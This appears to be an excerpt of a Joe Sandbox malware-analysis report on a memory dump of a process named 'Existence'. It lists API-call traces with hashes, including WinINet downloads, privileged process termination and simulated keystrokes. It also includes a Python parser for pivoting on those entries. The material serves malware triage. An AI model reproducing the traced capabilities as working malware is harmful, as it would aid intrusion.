                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                                          • Opcode ID: b040bb577a3f6e6ab25eed5878c626c7edc9e673fae7898a28283a14ee8fcb3c
                                                                                                                                                                                          • Instruction ID: f788075f4fc4af7b20d8a2b94c4611db2e56b675a2cdd3a17594ae660b0bbe18
                                                                                                                                                                                          • Opcode Fuzzy Hash: b040bb577a3f6e6ab25eed5878c626c7edc9e673fae7898a28283a14ee8fcb3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB314171600604BFD7329F658D88EAB7BFCEB86744B10462DF44697200DB38DD049B65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007755AE,?,?,Bad directive syntax error,007CDCD0,00000000,00000010,?,?), ref: 0079A236
                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,007755AE,?), ref: 0079A23D
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0079A301
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                                          • Opcode ID: 605df48f5affd571ac2202b7ff3598167b119930cb627cd3ec357d989b9ecad7
                                                                                                                                                                                          • Instruction ID: 26bd0ef30c8b4942ba0a103ff41a593ed0e9fecee2ca1f86edf2ce53b918a5c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 605df48f5affd571ac2202b7ff3598167b119930cb627cd3ec357d989b9ecad7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73216F7190021EFFDF15ABA0CC0AEEE7B39BF18300F044469F615651A2EB799618DB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

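The function entries above (one per "APIs" block: the Win32 calls with their call-site addresses, the API ID / String ID pair, and the fuzzy hashes) are the raw material for pivoting: which of the thousands of functions in the PID 10 dump touches WININET, which Instruction Fuzzy Hash also appears in another sample's report, and what the numeric message constants in the argument lists mean. The parser below is an added example and is not part of the Joe Sandbox report or tooling; the sample text is two entries copied from the report above, the list of network DLLs and the small Win32 constant tables are my own assumptions, and the `$` separator for String ID is inferred from the entries shown (a string that itself contains `$` would be split wrongly).

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two entries copied from the report above, trimmed to the lines this parser reads.
SAMPLE = """\
APIs
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 007C95C7
• ImageList_EndDrag.COMCTL32 ref: 007C95CD
• ReleaseCapture.USER32 ref: 007C95D3
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007C9681
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 007C975B
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Instruction Fuzzy Hash: 71517C71104304AFE754EF24CC5AFAA77E4FB84714F400A2CFA95962E2DB79AD48CB52
Uniqueness Score: -1.00%
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007ACCB7
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007ACCDF
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007ACD0F
• GetLastError.KERNEL32 ref: 007ACD67
• SetEvent.KERNEL32(?), ref: 007ACD7B
• InternetCloseHandle.WININET(00000000), ref: 007ACD86
• String ID:
• API String ID: 3113390036-3916222277
• Instruction Fuzzy Hash: CB314171600604BFD7329F658D88EAB7BFCEB86744B10462DF44697200DB38DD049B65
Uniqueness Score: -1.00%
"""

@dataclass
class ApiCall:
    function: str
    module: str
    args: list                        # raw argument cells, "?" where the sandbox could not resolve one
    ref: str                          # call-site address inside the dump
    subcall_of: Optional[str] = None  # callee address when listed as "Part of subcall function <addr>"

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "API ID", "Instruction Fuzzy Hash", ...
    strings: list = field(default_factory=list)  # String ID split on "$"
    uniqueness: Optional[float] = None

    def modules(self):
        return {c.module for c in self.calls}

KNOWN_FIELDS = {"Source File", "Snapshot File", "API ID", "String ID", "API String ID",
                "Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
API_LINE = re.compile(r"^(?:•\s*)?(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                      r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
FIELD_LINE = re.compile(r"^(?:•\s*)?([A-Za-z][A-Za-z ]*?):\s*(.*)$")
SCORE_LINE = re.compile(r"^Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%")

def parse_report(text):
    """Split the dump into one FunctionEntry per 'APIs' block; lines before the first block are ignored."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line:
            continue
        if (m := SCORE_LINE.match(line)):
            cur.uniqueness = float(m.group(1))
        elif (m := FIELD_LINE.match(line)) and m.group(1) in KNOWN_FIELDS:
            cur.fields[m.group(1)] = m.group(2)
            if m.group(1) == "String ID":
                cur.strings = [s for s in m.group(2).split("$") if s]
        elif (m := API_LINE.match(line)):
            sub, fn, mod, args, ref = m.groups()
            cur.calls.append(ApiCall(fn, mod, [a.strip() for a in args.split(",")] if args else [], ref, sub))
    return entries

# Assumed tables (not from the report): DLLs worth pivoting on and a few well-known Win32 constants.
NETWORK_MODULES = {"WININET", "WINHTTP", "WS2_32", "URLMON"}
WINDOW_MESSAGES = {0x31: "WM_GETFONT", 0xB1: "EM_SETSEL", 0x111: "WM_COMMAND", 0x202: "WM_LBUTTONUP"}
HTTP_QUERY_INFO = {5: "HTTP_QUERY_CONTENT_LENGTH"}
DECODE_ARG2 = {"SendMessageW": WINDOW_MESSAGES, "DefDlgProcW": WINDOW_MESSAGES, "HttpQueryInfoW": HTTP_QUERY_INFO}

def network_entries(entries):
    """Entries whose call chain touches a network DLL: where the download / C2 routine will be."""
    return [e for e in entries if e.modules() & NETWORK_MODULES]

def index_by_fuzzy_hash(entries):
    """Instruction Fuzzy Hash -> entries; equal hashes across two samples' reports point at shared code."""
    idx = {}
    for e in entries:
        if h := e.fields.get("Instruction Fuzzy Hash"):
            idx.setdefault(h, []).append(e)
    return idx

def decode_second_arg(call):
    """Name the constant in the second argument (message id / HttpQueryInfo level), or None if unknown."""
    table = DECODE_ARG2.get(call.function)
    if not table or len(call.args) < 2 or not re.fullmatch(r"[0-9A-Fa-f]+", call.args[1]):
        return None
    return table.get(int(call.args[1], 16))
```

Run `parse_report` over the full text of the report's function section rather than the two-entry sample, then `network_entries` to isolate the WinINet function (API String ID 3113390036-3916222277) and `index_by_fuzzy_hash` to compare against a second report; `decode_second_arg` turns the `00000005` in `HttpQueryInfoW` into `HTTP_QUERY_CONTENT_LENGTH` and the `000000B1` / `00000202` in the dialog code into `EM_SETSEL` / `WM_LBUTTONUP`.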
APIs
• GetParent.USER32 ref: 007929F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00792A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00792A9A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: 51e80c0b9d6a3e515451ae103458782adb8f2e6978762e2a5caacc4b707e1dd0
• Instruction ID: e7305829fc2de485f4d952041dc2fe65b9305af6a24ce8ba9da10d6840f88593
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e80c0b9d6a3e515451ae103458782adb8f2e6978762e2a5caacc4b707e1dd0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711E3B734830AF9FA247720EC0ADA677ADDF14724B308026FE04E40D2FBAD68464658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 0073758D
• GetWindowRect.USER32(?,?), ref: 007375CE
• ScreenToClient.USER32(?,?), ref: 007375F6
• GetClientRect.USER32(?,?), ref: 0073773A
• GetWindowRect.USER32(?,?), ref: 0073775B
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 698e72a407f8e2bc66da5e604c8797ef35ac90fe293b5f9ee05c7ec2a741174f
• Instruction ID: 34f4852668c0c827dd00a5d6d7cb1f59391696b34689d1bf43fd5d11452cf974
• Opcode Fuzzy Hash: 698e72a407f8e2bc66da5e604c8797ef35ac90fe293b5f9ee05c7ec2a741174f
• Instruction Fuzzy Hash: 76C16C7990464AEFEF24CFA8C540BEDB7F1FF18310F14841AE899A3255D738A951DB60
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: 353213a95b4a7ac839b0bc547b1d4bf925450141ad1e4238ea09e9970dfbdc28
• Instruction ID: 1652812f263284490673c0d281f8f3afa1036ba9f44631f034bd0a82f4fbd4ad
• Opcode Fuzzy Hash: 353213a95b4a7ac839b0bc547b1d4bf925450141ad1e4238ea09e9970dfbdc28
• Instruction Fuzzy Hash: 3C61F471F14701EFDF31AF65D899AAA7BA4FF02320F04016DED46EB282E6399C018751
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 007C5C24
• ShowWindow.USER32(?,00000000), ref: 007C5C65
• ShowWindow.USER32(?,00000005,?,00000000), ref: 007C5C6B
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 007C5C6F
  • Part of subcall function 007C79F2: DeleteObject.GDI32(00000000), ref: 007C7A1E
• GetWindowLongW.USER32(?,000000F0), ref: 007C5CAB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C5CB8
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007C5CEB
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 007C5D25
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 007C5D34
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
• Opcode ID: f3f8053a2a830dec0e44937aeb03370e9a2a6cfe0b99de2093effb55b5a5e949
• Instruction ID: 64f18fec579d0fbaa3712b5ff655b189b2acec62ec4d3f376592ff939dd43fac
• Opcode Fuzzy Hash: f3f8053a2a830dec0e44937aeb03370e9a2a6cfe0b99de2093effb55b5a5e949
• Instruction Fuzzy Hash: B1518A74A41B09AFEB349F24CC4DF993B61AB04760F14811EBA25AA1E1C77EB9C0DB51
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007728D1
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007728EA
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007728FA
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00772912
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00772933
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00772942
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0077295F
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007311F5,00000000,00000000,00000000,000000FF,00000000), ref: 0077296E
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: 3264dde7dbb8819ca60946900df23190e1c8d92159bf3f0b0e54210b38bbd3f1
• Instruction ID: 734ecf4d6a857d4155e74212f9b119c5d534ba1ff58cd21e7a6e4cdffcad6c46
• Opcode Fuzzy Hash: 3264dde7dbb8819ca60946900df23190e1c8d92159bf3f0b0e54210b38bbd3f1
• Instruction Fuzzy Hash: D0517B30600209EFEB24DF25CC45FAA7BB5FB48750F108528FA56A72A2D778ED91DB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACBC7
• GetLastError.KERNEL32 ref: 007ACBDA
• SetEvent.KERNEL32(?), ref: 007ACBEE
  • Part of subcall function 007ACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007ACCB7
  • Part of subcall function 007ACC98: GetLastError.KERNEL32 ref: 007ACD67
  • Part of subcall function 007ACC98: SetEvent.KERNEL32(?), ref: 007ACD7B
  • Part of subcall function 007ACC98: InternetCloseHandle.WININET(00000000), ref: 007ACD86
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
                                                                                                                                                                                          • Opcode ID: fffc50b60c2462a6b26e25f8f35cbe3cb377005215f02ade3e87db5c37dfb9ea
                                                                                                                                                                                          • Instruction ID: 00d25e0f69b81c00bb0f35961e570dbb69b6aa016d707849ccea1919670aa137
                                                                                                                                                                                          • Opcode Fuzzy Hash: fffc50b60c2462a6b26e25f8f35cbe3cb377005215f02ade3e87db5c37dfb9ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20317E71500705FFDB229F75CD48A6BBBF8FF85310B04862DF85A82610DB39E814AB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00794393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007943AD
  • Part of subcall function 00794393: GetCurrentThreadId.KERNEL32 ref: 007943B4
  • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00792F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00792F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00792F2C
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00792F36
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00792F4E
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00792F52
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00792F5C
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00792F70
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00792F74
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: d79523dd4ab48a2c03235fc4055a859464a86aa8aca9b20c556ce332a99cb0b5
• Instruction ID: b98a8d34f1333cb9eed6b45015d9628c316a75aaa62ca9f1ab23a4d44bdabac8
• Opcode Fuzzy Hash: d79523dd4ab48a2c03235fc4055a859464a86aa8aca9b20c556ce332a99cb0b5
• Instruction Fuzzy Hash: 25012430384214BBFB2027689C8EF593F5ADB4DB51F120029F318AE0E0C9E62801CAAD
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00791D95,?,?,00000000), ref: 00792159
• HeapAlloc.KERNEL32(00000000,?,00791D95,?,?,00000000), ref: 00792160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00791D95,?,?,00000000), ref: 00792175
• GetCurrentProcess.KERNEL32(?,00000000,?,00791D95,?,?,00000000), ref: 0079217D
• DuplicateHandle.KERNEL32(00000000,?,00791D95,?,?,00000000), ref: 00792180
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00791D95,?,?,00000000), ref: 00792190
• GetCurrentProcess.KERNEL32(00791D95,00000000,?,00791D95,?,?,00000000), ref: 00792198
• DuplicateHandle.KERNEL32(00000000,?,00791D95,?,?,00000000), ref: 0079219B
• CreateThread.KERNEL32(00000000,00000000,007921C1,00000000,00000000,00000000), ref: 007921B5
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 5a6db7b2fd009b88711084cc1679a01bfa4a61fd3e40080c87e06fa00691ff39
• Instruction ID: 03cbaee1a19f9bfc121bff9dc74c49654db203fed5bfdd9528b78070f68ce334
• Opcode Fuzzy Hash: 5a6db7b2fd009b88711084cc1679a01bfa4a61fd3e40080c87e06fa00691ff39
• Instruction Fuzzy Hash: 2001BBB5240348BFEB20AFA5DC4DF6B7BACEB88711F058425FA05DB1A1CA749C01CB24
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0079DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0079DDAC
  • Part of subcall function 0079DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0079DDBA
  • Part of subcall function 0079DD87: FindCloseChangeNotification.KERNEL32(00000000), ref: 0079DE87
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BABCA
• GetLastError.KERNEL32 ref: 007BABDD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BAC10
• TerminateProcess.KERNEL32(00000000,00000000), ref: 007BACC5
• GetLastError.KERNEL32(00000000), ref: 007BACD0
• CloseHandle.KERNEL32(00000000), ref: 007BAD21
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 1701285019-2896544425
• Opcode ID: 1b520732c31c810fb4e9cfb02b721ce7e45adf0ccc36e137544b45bfaaebdf03
• Instruction ID: ddfc1820f5a422b3cd0e85acda9f790c8aeac121c5663bee9d6bb9e71132abd3
• Opcode Fuzzy Hash: 1b520732c31c810fb4e9cfb02b721ce7e45adf0ccc36e137544b45bfaaebdf03
• Instruction Fuzzy Hash: 13619074204641EFD720EF18C499F65BBE1AF54308F58849CE4664BBA3C779EC45CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C43C1
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007C43D6
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C43F0
• _wcslen.LIBCMT ref: 007C4435
• SendMessageW.USER32(?,00001057,00000000,?), ref: 007C4462
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C4490
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
• Opcode ID: 54898e90b602428d91ed514abb606ff149ec01cdbe6fc6a04cc5672a807a5744
• Instruction ID: 5d5857b977892e042fdddb63aaba87d6c06eb164bf11b68c96a00d14d156ebac
• Opcode Fuzzy Hash: 54898e90b602428d91ed514abb606ff149ec01cdbe6fc6a04cc5672a807a5744
• Instruction Fuzzy Hash: 79419D71A00319ABDF219F64CC49FEA7BA9FB48350F10012EF958E7291D7B99D80DB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079C6C4
• IsMenu.USER32(00000000), ref: 0079C6E4
• CreatePopupMenu.USER32 ref: 0079C71A
• GetMenuItemCount.USER32(01145390), ref: 0079C76B
• InsertMenuItemW.USER32(01145390,?,00000001,00000030), ref: 0079C793
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID (Opcode Fuzzy Hash): 043cf2278c5ce8998ed608025e489cdb7a35b21789f49e7e2747dd511716da47
• Instruction ID: c9eb5d0eeb00a57093d7c0a8ecc39984537c36be91422a07884b5b81bd3e3088
• Instruction Fuzzy Hash: BA51B570600205EBDF22CFB8E9C8BAEBBF4AF59314F24416AE91197291D3789D45CF61
• Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32(?), ref: 007319E1
• ScreenToClient.USER32(00000000,?), ref: 007319FE
• GetAsyncKeyState.USER32(00000001), ref: 00731A23
• GetAsyncKeyState.USER32(00000002), ref: 00731A3D
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
